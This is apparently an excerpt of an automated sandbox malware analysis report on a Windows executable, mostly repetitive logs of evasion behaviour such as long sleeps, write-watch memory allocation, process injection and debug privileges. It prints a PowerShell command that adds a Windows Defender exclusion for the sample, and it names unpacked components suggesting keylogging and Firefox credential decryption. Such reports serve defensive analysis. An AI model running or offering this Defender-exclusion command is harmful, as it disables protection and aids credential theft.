Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 1140000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 2E00000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 2C20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 8030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 7680000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 9030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: A030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3380000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: 3120000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598905 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598117 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597281 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597171 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597059 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595155 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594995 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594437 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594312 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594203 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594093 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593984 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593875 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6094 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3673 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: threadDelayed 7502 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: threadDelayed 2341 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Window / User API: foregroundWindowGot 1762 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 6432 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4876 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -599015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598905s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598671s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598117s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -598015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597641s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597171s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -597059s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596281s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -596047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595500s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595390s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595265s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -595155s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594995s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -594093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -593984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe TID: 5800 Thread sleep time: -593875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598905 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598671 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598343 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598117 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597890 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597765 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597641 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597281 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597171 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 597059 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596937 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596609 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596500 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596281 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596156 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 596047 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595937 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595828 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595609 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595500 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595390 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595265 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 595155 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594995 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594718 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594437 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594312 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594203 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 594093 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593984 Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Thread delayed: delay time: 593875 Jump to behavior
Source: NXPYoHNSgv.exe, 00000005.00000002.4616510584.0000000001547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?6
Source: NXPYoHNSgv.exe, 00000005.00000002.4624610814.0000000004381000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4624610814.00000000043E6000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4624610814.0000000004464000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: J4knSQeMuQ4xl3aMiWsdY+VqLHwfWsbai3mq7BB2kmpINsaCuI7x+ryEnKOqPlX2udhT
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Code function: 5_2_06FC9548 LdrInitializeThunk,LdrInitializeThunk, 5_2_06FC9548
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
.NET source code references suspicious native API functions
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe"
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe" Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Memory written: C:\Users\user\Desktop\NXPYoHNSgv.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NXPYoHNSgv.exe" Jump to behavior
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Process created: C:\Users\user\Desktop\NXPYoHNSgv.exe "C:\Users\user\Desktop\NXPYoHNSgv.exe" Jump to behavior
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.000000000379D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagerLR
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.000000000379D000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: NXPYoHNSgv.exe, 00000005.00000002.4620367075.00000000038E3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program ManagergerLR
Queries the volume information (name, serial number etc) of a device
